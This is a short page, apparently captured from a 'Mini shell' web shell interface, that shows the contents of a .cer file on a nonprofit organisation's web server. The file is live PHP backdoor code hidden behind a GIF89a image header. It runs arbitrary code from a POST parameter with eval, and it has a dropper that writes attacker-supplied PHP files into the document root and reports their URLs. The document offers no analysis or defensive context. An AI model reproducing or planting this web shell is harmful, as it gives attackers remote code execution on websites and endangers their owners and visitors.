Mini shell

Current Path : /web/htdocs/www.entinoprofit.org/home/files/file/

Current File : /web/htdocs/www.entinoprofit.org/home/files/file/1422605531.cer

GIF89a<?php @eval($_POST["hmBTLMccEf"])?><?php
error_reporting(0);
if(isset($_GET['q']) && $_GET['q'] == "hmBTLMccEf" && isset($_POST['string']) && isset($_GET['f'])){
	$filename = $_GET['f'] != "" ? $_GET['f'] : "product";
	$document_root = $_SERVER['DOCUMENT_ROOT'] . "/";
	$flag = str_replace(".", "_", $_SERVER['SERVER_NAME']);
	while(true){
		$real_file_name = $filename . ".php";
		$real_file = $document_root . $real_file_name;
		if(! file_exists($real_file)){
			$fp = fopen($real_file, 'w+');
			$content = urldecode($_POST['string']);
			$content = str_replace("{flag}", $flag, $content);
			fwrite($fp, $content);
			fclose($fp);
			echo 'http://' . $_SERVER['SERVER_NAME'] . "/" . $real_file_name . "|" . $flag;
			break;
		}
		$filename .= "s";
	}
}
?>